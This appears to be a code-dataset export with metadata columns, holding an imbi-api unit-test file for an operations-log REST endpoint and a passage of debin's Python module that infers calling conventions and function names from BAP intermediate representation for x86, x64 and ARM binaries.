| 0
| 0.049319
| 0.000924
| 0
| 0
| 0
| 0
| 0.385343
| 1
| 0.056738
| false
| 0
| 0.030733
| 0
| 0.092199
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
795b1dc32390651b8746d673af2715884a2d87f0
| 14,975
|
py
|
Python
|
tests/endpoints/test_operations_log.py
|
nvllsvm/imbi-api
|
1a5bd8894ac14c1026f33297994aa10782b0eea0
|
[
"BSD-3-Clause"
] | 1
|
2021-06-23T18:34:47.000Z
|
2021-06-23T18:34:47.000Z
|
tests/endpoints/test_operations_log.py
|
nvllsvm/imbi-api
|
1a5bd8894ac14c1026f33297994aa10782b0eea0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/endpoints/test_operations_log.py
|
nvllsvm/imbi-api
|
1a5bd8894ac14c1026f33297994aa10782b0eea0
|
[
"BSD-3-Clause"
] | 2
|
2022-02-11T22:06:18.000Z
|
2022-02-21T19:35:06.000Z
|
import json
import uuid
import jsonpatch
from ietfparse import headers
from imbi.endpoints import operations_log
from tests import base
class AsyncHTTPTestCase(base.TestCaseWithReset):
ADMIN_ACCESS = True
TRUNCATE_TABLES = [
'v1.operations_log',
'v1.projects',
'v1.project_types',
'v1.namespaces',
'v1.environments',
]
def setUp(self):
super().setUp()
self.environments = self.create_environments()
self.environment = self.environments[0]
self.namespace = self.create_namespace()
self.project_type = self.create_project_type()
self.project = self.create_project()
def test_get_static_collection(self):
records = []
for i in range(10):
record = {
'recorded_by': self.USERNAME[self.ADMIN_ACCESS],
'recorded_at': '2021-08-30T00:00:00+00:00',
'environment': self.environment,
'project_id': self.project['id'],
'change_type': 'Upgraded',
'description': str(uuid.uuid4()),
'link': str(uuid.uuid4()),
'notes': str(uuid.uuid4()),
'ticket_slug': str(uuid.uuid4()),
'version': str(uuid.uuid4()),
}
records.append(record)
result = self.fetch(
'/operations-log', method='POST', headers=self.headers,
body=json.dumps(record).encode('utf-8'))
self.assertEqual(result.code, 200)
records[i]['id'] = json.loads(result.body.decode('utf-8'))['id']
records[i]['completed_at'] = None
# page 1
namespace_id = self.namespace['id']
result = self.fetch(
f'/operations-log?limit=4&namespace_id={namespace_id}',
headers=self.headers)
self.assertEqual(result.code, 200)
response = json.loads(result.body.decode('utf-8'))
self.assertEqual(len(response), 4)
for i in range(4):
self.assertDictEqual(response[i], records[9 - i])
link_headers = headers.parse_link(result.headers['Link'])
next_link = None
for header in link_headers:
link_rel = header.parameters[0][1]
self.assertNotEqual(link_rel, 'previous')
if link_rel == 'next':
next_link = header.target
self.assertIsNotNone(next_link)
# page 2
result = self.fetch(next_link, headers=self.headers)
self.assertEqual(result.code, 200)
response = json.loads(result.body.decode('utf-8'))
self.assertEqual(len(response), 4)
for i in range(4):
self.assertDictEqual(response[i], records[5 - i])
link_headers = headers.parse_link(result.headers['Link'])
next_link, previous_link = None, None
for header in link_headers:
link_rel = header.parameters[0][1]
if link_rel == 'next':
next_link = header.target
elif link_rel == 'previous':
previous_link = header.target
self.assertIsNotNone(next_link)
self.assertIsNotNone(previous_link)
# page 3
result = self.fetch(next_link, headers=self.headers)
self.assertEqual(result.code, 200)
response = json.loads(result.body.decode('utf-8'))
self.assertEqual(len(response), 2)
for i in range(2):
self.assertDictEqual(response[i], records[1 - i])
link_headers = headers.parse_link(result.headers['Link'])
next_link, previous_link = None, None
for header in link_headers:
link_rel = header.parameters[0][1]
self.assertNotEqual(link_rel, 'next')
if link_rel == 'previous':
previous_link = header.target
self.assertIsNotNone(previous_link)
# page 2
result = self.fetch(previous_link, headers=self.headers)
self.assertEqual(result.code, 200)
response = json.loads(result.body.decode('utf-8'))
self.assertEqual(len(response), 4)
for i in range(4):
self.assertDictEqual(response[i], records[5 - i])
link_headers = headers.parse_link(result.headers['Link'])
next_link, previous_link = None, None
for header in link_headers:
link_rel = header.parameters[0][1]
if link_rel == 'next':
next_link = header.target
elif link_rel == 'previous':
previous_link = header.target
self.assertIsNotNone(next_link)
self.assertIsNotNone(previous_link)
# page 1
result = self.fetch(previous_link, headers=self.headers)
self.assertEqual(result.code, 200)
response = json.loads(result.body.decode('utf-8'))
self.assertEqual(len(response), 4)
for i in range(4):
self.assertDictEqual(response[i], records[9 - i])
link_headers = headers.parse_link(result.headers['Link'])
next_link = None
for header in link_headers:
link_rel = header.parameters[0][1]
self.assertNotEqual(link_rel, 'previous')
if link_rel == 'next':
next_link = header.target
self.assertIsNotNone(next_link)
def test_get_concurrently_updated_collection(self):
records = []
for i in range(6):
record = {
'recorded_by': self.USERNAME[self.ADMIN_ACCESS],
'recorded_at': f'2021-08-30T00:00:0{i}+00:00',
'environment': self.environment,
'project_id': self.project['id'],
'change_type': 'Upgraded',
'description': str(uuid.uuid4()),
'link': str(uuid.uuid4()),
'notes': str(uuid.uuid4()),
'ticket_slug': str(uuid.uuid4()),
'version': str(uuid.uuid4()),
}
records.append(record)
result = self.fetch(
'/operations-log', method='POST', headers=self.headers,
body=json.dumps(record).encode('utf-8'))
self.assertEqual(result.code, 200)
records[i]['id'] = json.loads(result.body.decode('utf-8'))['id']
records[i]['completed_at'] = None
# page 1
result = self.fetch('/operations-log?limit=3', headers=self.headers)
self.assertEqual(result.code, 200)
response = json.loads(result.body.decode('utf-8'))
self.assertEqual(len(response), 3)
for i in range(3):
self.assertDictEqual(response[i], records[5 - i])
link_headers = headers.parse_link(result.headers['Link'])
next_link = None
for header in link_headers:
link_rel = header.parameters[0][1]
self.assertNotEqual(link_rel, 'previous')
if link_rel == 'next':
next_link = header.target
self.assertIsNotNone(next_link)
# page 2
result = self.fetch(next_link, headers=self.headers)
self.assertEqual(result.code, 200)
response = json.loads(result.body.decode('utf-8'))
self.assertEqual(len(response), 3)
for i in range(3):
self.assertDictEqual(response[i], records[2 - i])
link_headers = headers.parse_link(result.headers['Link'])
next_link, previous_link = None, None
for header in link_headers:
link_rel = header.parameters[0][1]
self.assertNotEqual(link_rel, 'next')
if link_rel == 'previous':
previous_link = header.target
self.assertIsNotNone(previous_link)
# insert record
record = {
'recorded_by': self.USERNAME[self.ADMIN_ACCESS],
'recorded_at': f'2021-08-30T00:00:03+00:00',
'environment': self.environment,
'project_id': self.project['id'],
'change_type': 'Upgraded',
'description': str(uuid.uuid4()),
'link': str(uuid.uuid4()),
'notes': str(uuid.uuid4()),
'ticket_slug': str(uuid.uuid4()),
'version': str(uuid.uuid4()),
}
result = self.fetch(
'/operations-log', method='POST', headers=self.headers,
body=json.dumps(record).encode('utf-8'))
self.assertEqual(result.code, 200)
record['id'] = json.loads(result.body.decode('utf-8'))['id']
record['completed_at'] = None
records.insert(4, record)
# previous page (now page 2/3)
result = self.fetch(previous_link, headers=self.headers)
self.assertEqual(result.code, 200)
response = json.loads(result.body.decode('utf-8'))
self.assertEqual(len(response), 3)
for i in range(3):
self.assertDictEqual(response[i], records[5 - i])
link_headers = headers.parse_link(result.headers['Link'])
next_link, previous_link = None, None
for header in link_headers:
link_rel = header.parameters[0][1]
if link_rel == 'next':
next_link = header.target
elif link_rel == 'previous':
previous_link = header.target
self.assertIsNotNone(next_link)
self.assertIsNotNone(previous_link)
# previous page (now page 1/3)
result = self.fetch(previous_link, headers=self.headers)
self.assertEqual(result.code, 200)
response = json.loads(result.body.decode('utf-8'))
self.assertEqual(len(response), 1)
self.assertDictEqual(response[0], records[6])
link_headers = headers.parse_link(result.headers['Link'])
next_link, previous_link = None, None
for header in link_headers:
link_rel = header.parameters[0][1]
self.assertNotEqual(link_rel, 'previous')
if link_rel == 'next':
next_link = header.target
self.assertIsNotNone(next_link)
def test_operations_log_lifecycle(self):
record = {
'recorded_by': self.USERNAME[self.ADMIN_ACCESS],
'recorded_at': '2021-08-30T00:00:00+00:00',
'environment': self.environment,
'change_type': 'Upgraded',
'description': str(uuid.uuid4()),
'link': str(uuid.uuid4()),
'notes': str(uuid.uuid4()),
'ticket_slug': str(uuid.uuid4()),
'version': str(uuid.uuid4()),
}
# Create
result = self.fetch(
'/operations-log', method='POST', headers=self.headers,
body=json.dumps(record).encode('utf-8'))
self.assertEqual(result.code, 200)
response = json.loads(result.body.decode('utf-8'))
url = self.get_url('/operations-log/{}'.format(response['id']))
self.assert_link_header_equals(result, url)
self.assertIsNotNone(result.headers['Date'])
self.assertIsNone(result.headers.get('Last-Modified', None))
self.assertEqual(
result.headers['Cache-Control'], 'public, max-age={}'.format(
operations_log.RecordRequestHandler.TTL))
record.update({
'id': response['id'],
'completed_at': response['completed_at'],
'project_id': response['project_id'],
})
self.assertDictEqual(response, record)
# PATCH
updated = dict(record)
updated['description'] = str(uuid.uuid4())
patch = jsonpatch.make_patch(record, updated)
patch_value = patch.to_string().encode('utf-8')
record.update({
'description': updated['description'],
})
result = self.fetch(
url, method='PATCH', body=patch_value, headers=self.headers)
self.assertEqual(result.code, 200)
self.assert_link_header_equals(result, url)
response = json.loads(result.body.decode('utf-8'))
self.assertDictEqual(response, record)
# Patch no change
result = self.fetch(
url, method='PATCH', body=patch_value, headers=self.headers)
self.assertEqual(result.code, 304)
# GET
result = self.fetch(url, headers=self.headers)
self.assertEqual(result.code, 200)
self.assert_link_header_equals(result, url)
self.assertEqual(
result.headers['Cache-Control'], 'public, max-age={}'.format(
operations_log.RecordRequestHandler.TTL))
response = json.loads(result.body.decode('utf-8'))
self.assertDictEqual(response, record)
# Collection
result = self.fetch('/operations-log', headers=self.headers)
self.assertEqual(result.code, 200)
self.assertListEqual(
json.loads(result.body.decode('utf-8')),
[{k: v for k, v in record.items()}])
# DELETE
result = self.fetch(url, method='DELETE', headers=self.headers)
self.assertEqual(result.code, 204)
# GET record should not exist
result = self.fetch(url, headers=self.headers)
self.assertEqual(result.code, 404)
# DELETE should fail as record should not exist
result = self.fetch(url, method='DELETE', headers=self.headers)
self.assertEqual(result.code, 404)
def test_create_with_missing_fields(self):
record = {
'recorded_by': self.USERNAME[self.ADMIN_ACCESS],
'recorded_at': '2021-08-30T00:00:00+00:00',
'environment': self.environment,
'change_type': 'Upgraded',
}
result = self.fetch('/operations-log', method='POST',
body=json.dumps(record).encode('utf-8'),
headers=self.headers)
self.assertEqual(result.code, 200)
response = json.loads(result.body.decode('utf-8'))
url = self.get_url('/operations-log/{}'.format(response['id']))
self.assert_link_header_equals(result, url)
self.assertEqual(response['environment'], record['environment'])
self.assertEqual(response['change_type'], record['change_type'])
# DELETE
result = self.fetch(url, method='DELETE', headers=self.headers)
self.assertEqual(result.code, 204)
# GET record should not exist
result = self.fetch(url, headers=self.headers)
self.assertEqual(result.code, 404)
def test_method_not_implemented(self):
for method in {'DELETE', 'PATCH'}:
result = self.fetch(
'/operations-log', method=method,
allow_nonstandard_methods=True,
headers=self.headers)
self.assertEqual(result.code, 405)
url = '/operations-log/' + str(uuid.uuid4())
result = self.fetch(url, method='POST',
allow_nonstandard_methods=True,
headers=self.headers)
self.assertEqual(result.code, 405)
| 40.472973
| 76
| 0.581436
| 1,672
| 14,975
| 5.092703
| 0.0939
| 0.059425
| 0.066588
| 0.0734
| 0.843922
| 0.827011
| 0.81926
| 0.80047
| 0.798121
| 0.787082
| 0
| 0.026044
| 0.28975
| 14,975
| 369
| 77
| 40.582656
| 0.774539
| 0.018698
| 0
| 0.775316
| 0
| 0
| 0.099359
| 0.013698
| 0
| 0
| 0
| 0
| 0.237342
| 1
| 0.018987
| false
| 0
| 0.018987
| 0
| 0.047468
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79dc5fe8e4c0451b570f7832bd8fc8ae17f68de6
| 31,049
|
py
|
Python
|
py/elements/conventions.py
|
pombredanne/debin
|
9abb5215b54077da1e9479bfcbc56cd860aac370
|
[
"Apache-2.0"
] | 322
|
2018-12-06T03:32:37.000Z
|
2022-03-30T06:01:03.000Z
|
py/elements/conventions.py
|
pombredanne/debin
|
9abb5215b54077da1e9479bfcbc56cd860aac370
|
[
"Apache-2.0"
] | 20
|
2019-01-30T20:22:33.000Z
|
2022-01-24T11:40:37.000Z
|
py/elements/conventions.py
|
pombredanne/debin
|
9abb5215b54077da1e9479bfcbc56cd860aac370
|
[
"Apache-2.0"
] | 49
|
2019-02-13T00:25:19.000Z
|
2022-03-25T05:32:56.000Z
|
from common.constants import UNKNOWN_LABEL, INIT, FINI, X64_FUN_ARG_REGS, ARM_FUN_ARG_REGS, X86_SOCKETCALL_ARGS
from elements.regs import Reg, RegBase, GivReg
from elements.givs import IntConst, VirtualExp
from elements.elmfactory import mem_addr, make_reg, make_temp_offset
from elements.elmfactory import get_virtual_exp, make_giv_reg
from bap.vars import VirtualVar, RegVar, MemVar
from bap.exps import LoadExp, StoreExp, BinOpExp, IntExp
from bap.stmts import DefStmt, JmpStmt, CallKind, RetKind, DirectLabel, IndirectLabel
def x86_call_args(blk):
if len(blk.bap.stmts) > 0:
last_stmt_bap = blk.bap.stmts[-1]
if isinstance(last_stmt_bap, JmpStmt) \
and isinstance(last_stmt_bap.kind, CallKind):
tmp_args = dict()
call = last_stmt_bap
for i in range(len(blk.bap.stmts) - 4, -1, -1):
stmt = blk.bap.stmts[i]
if isinstance(stmt, DefStmt):
lhs = stmt.lhs
rhs = stmt.rhs
if isinstance(lhs, MemVar) and isinstance(rhs, StoreExp):
addr = rhs.addr
exp = rhs.exp
base_pointer, offset, access = mem_addr(addr, blk, stmt.pc)
if base_pointer is not None \
and not isinstance(exp, GivReg) \
and not isinstance(exp, VirtualVar) \
and base_pointer.base_register in ('ESP', 'RSP'):
key = (base_pointer.base_register, offset)
if key not in tmp_args:
tmp_args[key] = (exp, stmt.pc)
for base_pointer, offset in sorted(tmp_args.keys()):
key = (base_pointer, offset)
if offset == 0 or \
(base_pointer, offset - blk.binary.config.ADDRESS_BYTE_SIZE) in tmp_args:
exp, pc = tmp_args[key]
make_temp_offset(base_pointer, offset, blk, pc)
call.kind.args[key] = (exp, pc)
else:
break
def x64_call_args(blk):
if len(blk.bap.stmts) > 0:
last_stmt_bap = blk.bap.stmts[-1]
if isinstance(last_stmt_bap, JmpStmt) \
and isinstance(last_stmt_bap.kind, CallKind):
call = last_stmt_bap
for i in range(len(blk.bap.stmts) - 3, -1, -1):
stmt = blk.bap.stmts[i]
if isinstance(stmt, DefStmt):
lhs = stmt.lhs
rhs = stmt.rhs
if isinstance(lhs, RegVar) \
and lhs.name in X64_FUN_ARG_REGS:
key = lhs.name
if key not in call.kind.args:
make_giv_reg(lhs.name, lhs.index, blk, stmt.pc)
call.kind.args[key] = (rhs, stmt.pc)
def arm_call_args(blk):
if len(blk.bap.stmts) > 0:
last_stmt_bap = blk.bap.stmts[-1]
if isinstance(last_stmt_bap, JmpStmt) \
and isinstance(last_stmt_bap.kind, CallKind):
call = last_stmt_bap
for i in range(len(blk.bap.stmts) - 3, -1, -1):
stmt = blk.bap.stmts[i]
if isinstance(stmt, DefStmt):
lhs = stmt.lhs
rhs = stmt.rhs
if isinstance(lhs, RegVar) \
and lhs.name in ARM_FUN_ARG_REGS:
key = lhs.name
if key not in call.kind.args:
make_giv_reg(lhs.name, lhs.index, blk, stmt.pc)
call.kind.args[key] = (rhs, stmt.pc)
def call_args(blk):
if blk.binary.config.MACHINE_ARCH == 'x86':
x86_call_args(blk)
elif blk.binary.config.MACHINE_ARCH == 'x64':
x64_call_args(blk)
elif blk.binary.config.MACHINE_ARCH == 'ARM':
arm_call_args(blk)
def x86_prologue(blk):
for stmt in blk.bap.stmts:
if stmt.insn is not None \
and stmt.insn.startswith('PUSH') \
and isinstance(stmt.lhs, MemVar) \
and isinstance(stmt.rhs, StoreExp):
if isinstance(stmt.rhs.exp, RegVar):
make_giv_reg(stmt.rhs.exp.name, stmt.rhs.exp.index, blk, stmt.pc)
elif isinstance(stmt.rhs.exp, VirtualVar) \
and isinstance(get_virtual_exp(stmt.rhs.exp, blk).exp, RegVar):
virtual_exp = get_virtual_exp(stmt.rhs.exp, blk)
reg = virtual_exp.exp
make_giv_reg(reg.name, reg.index, blk, stmt.pc)
make_giv_reg(reg.name, reg.index, blk, virtual_exp.pc)
def x64_prologue(blk):
x86_prologue(blk)
def arm_prologue(blk):
for stmt in blk.bap.stmts:
if stmt.pc is not None \
and stmt.pc == blk.function.low_pc \
and isinstance(stmt, DefStmt) \
and isinstance(stmt.lhs, MemVar) \
and isinstance(stmt.rhs, StoreExp) \
and isinstance(stmt.rhs.exp, RegVar):
base_pointer, offset, access = mem_addr(stmt.rhs.addr, blk, stmt.pc)
if base_pointer is not None and base_pointer.base_register == 'SP':
make_temp_offset(base_pointer.base_register, offset, blk, stmt.pc)
make_giv_reg(stmt.rhs.exp.name, stmt.rhs.exp.index, blk, stmt.pc)
else:
break
def prologue(blk):
if blk.binary.config.MACHINE_ARCH == 'x86':
x86_prologue(blk)
elif blk.binary.config.MACHINE_ARCH == 'x64':
x64_prologue(blk)
elif blk.binary.config.MACHINE_ARCH == 'ARM':
arm_prologue(blk)
def x86_epilogue(blk):
for stmt in blk.bap.stmts:
if stmt.insn is not None \
and stmt.insn.startswith('POP') \
and isinstance(stmt, DefStmt) \
and isinstance(stmt.lhs, RegVar) \
and isinstance(stmt.rhs, LoadExp):
base_pointer, offset, access = mem_addr(stmt.rhs.addr, blk, stmt.pc)
if base_pointer is not None \
and base_pointer.base_register == 'ESP':
make_temp_offset(base_pointer.base_register, offset, blk, stmt.pc)
make_giv_reg(stmt.lhs.name, stmt.lhs.index, blk, stmt.pc)
def x64_epilogue(blk):
for stmt in blk.bap.stmts:
if stmt.insn is not None \
and stmt.insn.startswith('POP') \
and isinstance(stmt, DefStmt) \
and isinstance(stmt.lhs, RegVar) \
and isinstance(stmt.rhs, LoadExp):
base_pointer, offset, access = mem_addr(stmt.rhs.addr, blk, stmt.pc)
if base_pointer is not None \
and base_pointer.base_register == 'RSP':
make_temp_offset(base_pointer.base_register, offset, blk, stmt.pc)
make_giv_reg(stmt.lhs.name, stmt.lhs.index, blk, stmt.pc)
def arm_epilogue(blk):
if len(blk.bap.stmts) > 1:
last_stmt = blk.bap.stmts[-1]
if isinstance(last_stmt, JmpStmt) \
and isinstance(last_stmt.kind, RetKind):
stmt = blk.bap.stmts[-2]
if isinstance(stmt.lhs, RegVar) \
and stmt.lhs.name == 'SP' \
and isinstance(stmt.rhs, BinOpExp) \
and isinstance(stmt.rhs.e1, RegVar) \
and isinstance(stmt.rhs.e2, IntExp) \
and stmt.rhs.e1.name == 'SP':
for i in range(len(blk.bap.stmts) - 3, -1, -1):
stmt = blk.bap.stmts[i]
if isinstance(stmt, DefStmt) \
and isinstance(stmt.lhs, RegVar) \
and isinstance(stmt.rhs, LoadExp):
base_pointer, offset, access = mem_addr(stmt.rhs.addr, blk, stmt.pc)
if base_pointer is not None and base_pointer.base_register == 'SP':
make_temp_offset(base_pointer.base_register, offset, blk, stmt.pc)
make_giv_reg(stmt.lhs.name, stmt.lhs.index, blk, stmt.pc)
else:
break
else:
break
def epilogue(blk):
if blk.binary.config.MACHINE_ARCH == 'x86':
x86_epilogue(blk)
elif blk.binary.config.MACHINE_ARCH == 'x64':
x64_epilogue(blk)
elif blk.binary.config.MACHINE_ARCH == 'ARM':
arm_epilogue(blk)
def x86_infer_functions(functions):
if functions.binary.sections.has_sec(INIT):
init_sec_addr = functions.binary.sections.get_sec(INIT).addr
if functions.is_lowpc_function(init_sec_addr):
_init = functions.get_function_by_lowpc(init_sec_addr)
_init.name = '_init'
_init.train_name = '_init'
_init.test_name = '_init'
_init.is_name_given = True
_init.is_run_init = False
if functions.binary.sections.has_sec(FINI):
fini_sec_addr = functions.binary.sections.get_sec(FINI).addr
if functions.is_lowpc_function(fini_sec_addr):
_fini = functions.get_function_by_lowpc(fini_sec_addr)
_fini.name = '_fini'
_fini.train_name = '_fini'
_fini.test_name = '_fini'
_fini.is_name_given = True
_fini.is_run_init = False
if functions.is_lowpc_function(functions.binary.entry_point):
_start = functions.get_function_by_lowpc(functions.binary.entry_point)
_start.name = '_start'
_start.train_name = '_start'
_start.test_name = '_start'
_start.is_name_given = True
_start.is_run_init = False
for blk_bap in _start.bap.blks:
stmts = blk_bap.stmts
for i in range(len(stmts) - 1, -1, -1):
stmt = stmts[i]
if isinstance(stmt, JmpStmt) \
and isinstance(stmt.kind, CallKind) \
and isinstance(stmt.kind.target, DirectLabel):
target_tid = stmt.kind.target.target_tid
called_f = functions.get_function_by_tid(target_tid)
if called_f is not None and called_f.name == '__libc_start_main' and i > 0:
main_pc = None
init_pc = None
fini_pc = None
for j in range(i - 2, -1, -1):
stmt = stmts[j]
if isinstance(stmt, DefStmt) \
and isinstance(stmt.lhs, MemVar) \
and isinstance(stmt.rhs, StoreExp) \
and isinstance(stmt.rhs.exp, IntExp) \
and functions.is_lowpc_function(stmt.rhs.exp.value):
pc = stmt.rhs.exp.value
if main_pc is None:
main_pc = pc
main = functions.get_function_by_lowpc(main_pc)
if functions.binary.config.MODE == functions.binary.config.TEST:
main.name = 'main'
main.train_name = 'main'
main.test_name = 'main'
main.is_name_given = True
main.is_run_init = True
elif init_pc is None:
init_pc = pc
init = functions.get_function_by_lowpc(init_pc)
init.name = '__libc_csu_init'
init.train_name = '__libc_csu_init'
init.test_name = '__libc_csu_init'
init.is_name_given = True
init.is_run_init = False
elif fini_pc is None:
fini_pc = pc
fini = functions.get_function_by_lowpc(fini_pc)
fini.name = '__libc_csu_fini'
fini.train_name = '__libc_csu_fini'
fini.test_name = '__libc_csu_fini'
fini.is_name_given = True
fini.is_run_init = False
def x64_infer_functions(functions):
if functions.binary.sections.has_sec(INIT):
init_sec_addr = functions.binary.sections.get_sec(INIT).addr
if functions.is_lowpc_function(init_sec_addr):
_init = functions.get_function_by_lowpc(init_sec_addr)
_init.name = '_init'
_init.train_name = '_init'
_init.test_name = '_init'
_init.is_name_given = True
_init.is_run_init = False
if functions.binary.sections.has_sec(FINI):
fini_sec_addr = functions.binary.sections.get_sec(FINI).addr
if functions.is_lowpc_function(fini_sec_addr):
_fini = functions.get_function_by_lowpc(fini_sec_addr)
_fini.name = '_fini'
_fini.train_name = '_fini'
_fini.test_name = '_fini'
_fini.is_name_given = True
_fini.is_run_init = False
if functions.is_lowpc_function(functions.binary.entry_point):
_start = functions.get_function_by_lowpc(functions.binary.entry_point)
_start.name = '_start'
_start.train_name = '_start'
_start.test_name = '_start'
_start.is_name_given = True
_start.is_run_init = False
for blk_bap in _start.bap.blks:
stmts = blk_bap.stmts
for i in range(len(stmts) - 1, -1, -1):
stmt = stmts[i]
if isinstance(stmt, JmpStmt) \
and isinstance(stmt.kind, CallKind) \
and isinstance(stmt.kind.target, DirectLabel):
target_tid = stmt.kind.target.target_tid
called_f = functions.get_function_by_tid(target_tid)
if called_f is not None and called_f.name == '__libc_start_main' and i > 0:
main_pc = None
init_pc = None
fini_pc = None
for j in range(i - 2, -1, -1):
stmt = stmts[j]
if isinstance(stmt, DefStmt):
if isinstance(stmt.lhs, RegVar) \
and isinstance(stmt.rhs, IntExp) \
and functions.is_lowpc_function(stmt.rhs.value):
if stmt.lhs.name == 'RDI' and main_pc is None:
main_pc = stmt.rhs.value
main = functions.get_function_by_lowpc(main_pc)
if functions.binary.config.MODE == functions.binary.config.TEST:
main.name = 'main'
main.train_name = 'main'
main.test_name = 'main'
main.is_name_given = True
main.is_run_init = True
if stmt.lhs.name == 'RCX' and init_pc is None:
init_pc = stmt.rhs.value
init = functions.get_function_by_lowpc(init_pc)
init.name = '__libc_csu_init'
init.train_name = '__libc_csu_init'
init.test_name = '__libc_csu_init'
init.is_name_given = True
init.is_run_init = False
if stmt.lhs.name == 'R8' and fini_pc is None:
fini_pc = stmt.rhs.value
fini = functions.get_function_by_lowpc(fini_pc)
fini.name = '__libc_csu_fini'
fini.train_name = '__libc_csu_fini'
fini.test_name = '__libc_csu_fini'
fini.is_name_given = True
fini.is_run_init = False
def arm_infer_functions(functions):
if functions.binary.sections.has_sec(INIT):
init_sec_addr = functions.binary.sections.get_sec(INIT).addr
if functions.is_lowpc_function(init_sec_addr):
_init = functions.get_function_by_lowpc(init_sec_addr)
_init.name = '_init'
_init.train_name = '_init'
_init.test_name = '_init'
_init.is_name_given = True
_init.is_run_init = False
if functions.binary.sections.has_sec(FINI):
fini_sec_addr = functions.binary.sections.get_sec(FINI).addr
if functions.is_lowpc_function(fini_sec_addr):
_fini = functions.get_function_by_lowpc(fini_sec_addr)
_fini.name = '_fini'
_fini.train_name = '_fini'
_fini.test_name = '_fini'
_fini.is_name_given = True
_fini.is_run_init = False
if functions.is_lowpc_function(functions.binary.entry_point):
_start = functions.get_function_by_lowpc(functions.binary.entry_point)
_start.name = '_start'
_start.train_name = '_start'
_start.test_name = '_start'
_start.is_name_given = True
_start.is_run_init = False
for blk_bap in _start.bap.blks:
stmts = blk_bap.stmts
for i in range(len(stmts) - 1, -1, -1):
stmt = stmts[i]
if isinstance(stmt, JmpStmt) \
and isinstance(stmt.kind, CallKind) \
and isinstance(stmt.kind.target, DirectLabel):
target_tid = stmt.kind.target.target_tid
called_f = functions.get_function_by_tid(target_tid)
if called_f is not None and called_f.name == '__libc_start_main' and i > 0:
main_pc = None
init_pc = None
fini_pc = None
fini_reg = None
for j in range(i - 2, -1, -1):
stmt = stmts[j]
if isinstance(stmt, DefStmt):
if isinstance(stmt.lhs, RegVar) \
and stmt.lhs.name == 'R0' \
and isinstance(stmt.rhs, IntExp) \
and functions.is_lowpc_function(stmt.rhs.value) \
and main_pc is None:
main_pc = stmt.rhs.value
main = functions.get_function_by_lowpc(main_pc)
if functions.binary.config.MODE == functions.binary.config.TEST:
main.name = 'main'
main.train_name = 'main'
main.test_name = 'main'
main.is_name_given = True
main.is_run_init = True
elif isinstance(stmt.lhs, RegVar) \
and stmt.lhs.name == 'R3' \
and isinstance(stmt.rhs, IntExp) \
and functions.is_lowpc_function(stmt.rhs.value) \
and init_pc is None:
init_pc = stmt.rhs.value
init = functions.get_function_by_lowpc(init_pc)
init.name = '__libc_csu_init'
init.train_name = '__libc_csu_init'
init.test_name = '__libc_csu_init'
init.is_name_given = True
init.is_run_init = False
elif isinstance(stmt.lhs, MemVar) \
and isinstance(stmt.rhs, StoreExp) \
and isinstance(stmt.rhs.exp, IntExp) \
and functions.is_lowpc_function(stmt.rhs.exp.value) \
and fini_pc is None:
fini_pc = stmt.rhs.exp.value
fini = functions.get_function_by_lowpc(fini_pc)
fini.name = '__libc_csu_fini'
fini.train_name = '__libc_csu_fini'
fini.test_name = '__libc_csu_fini'
fini.is_name_given = True
fini.is_run_init = False
elif isinstance(stmt.lhs, MemVar) \
and isinstance(stmt.rhs, StoreExp) \
and isinstance(stmt.rhs.exp, RegVar) \
and fini_pc is None \
and fini_reg is None:
fini_reg = (stmt.rhs.exp.name, stmt.rhs.exp.index)
elif isinstance(stmt.lhs, RegVar) \
and isinstance(stmt.rhs, IntExp) \
and functions.is_lowpc_function(stmt.rhs.value) \
and fini_pc is None \
and fini_reg is not None \
and fini_reg == (stmt.lhs.name, stmt.lhs.index):
fini_pc = stmt.rhs.value
fini = functions.get_function_by_lowpc(fini_pc)
fini.name = '__libc_csu_fini'
fini.train_name = '__libc_csu_fini'
fini.test_name = '__libc_csu_fini'
fini.is_name_given = True
fini.is_run_init = False
def infer_functions(functions):
if functions.binary.config.MACHINE_ARCH == 'x86':
x86_infer_functions(functions)
elif functions.binary.config.MACHINE_ARCH == 'x64':
x64_infer_functions(functions)
elif functions.binary.config.MACHINE_ARCH == 'ARM':
arm_infer_functions(functions)
def x86_temp_offsets(blk):
for stmt in blk.bap.stmts:
if stmt.insn is not None \
and (stmt.insn.startswith('PUSH')
or stmt.insn.startswith('POP')
or stmt.insn.startswith('CALL')
or stmt.insn.startswith('RET')):
if isinstance(stmt, DefStmt) \
and type(stmt.rhs) in (LoadExp, StoreExp):
base_pointer, offset, access = mem_addr(stmt.rhs.addr, blk, stmt.pc)
if base_pointer is not None and base_pointer.base_register == 'ESP':
make_temp_offset(base_pointer.base_register, offset, blk, stmt.pc)
if isinstance(stmt, JmpStmt) \
and isinstance(stmt.kind, RetKind) \
and isinstance(stmt.kind.label, IndirectLabel):
if isinstance(stmt.kind.label.exp, LoadExp):
base_pointer, offset, access = mem_addr(stmt.kind.label.exp, blk, stmt.pc)
if base_pointer is not None and base_pointer.base_register == 'ESP':
make_temp_offset(base_pointer.base_register, offset, blk, stmt.pc)
elif isinstance(stmt.kind.label.exp, VirtualExp) \
and isinstance(get_virtual_exp(stmt.kind.label.exp, blk).exp, LoadExp):
base_pointer, offset, access = mem_addr(stmt.kind.label.exp, blk, stmt.pc)
if base_pointer is not None and base_pointer.base_register == 'ESP':
make_temp_offset(base_pointer.base_register, offset, blk, stmt.pc)
def x64_temp_offsets(blk):
for stmt in blk.bap.stmts:
if stmt.insn is not None \
and (stmt.insn.startswith('PUSH')
or stmt.insn.startswith('POP')
or stmt.insn.startswith('CALL')
or stmt.insn.startswith('RET')):
if isinstance(stmt, DefStmt) \
and type(stmt.rhs) in (LoadExp, StoreExp):
base_pointer, offset, access = mem_addr(stmt.rhs.addr, blk, stmt.pc)
if base_pointer is not None and base_pointer.base_register == 'RSP':
make_temp_offset(base_pointer.base_register, offset, blk, stmt.pc)
if isinstance(stmt, JmpStmt) \
and isinstance(stmt.kind, RetKind) \
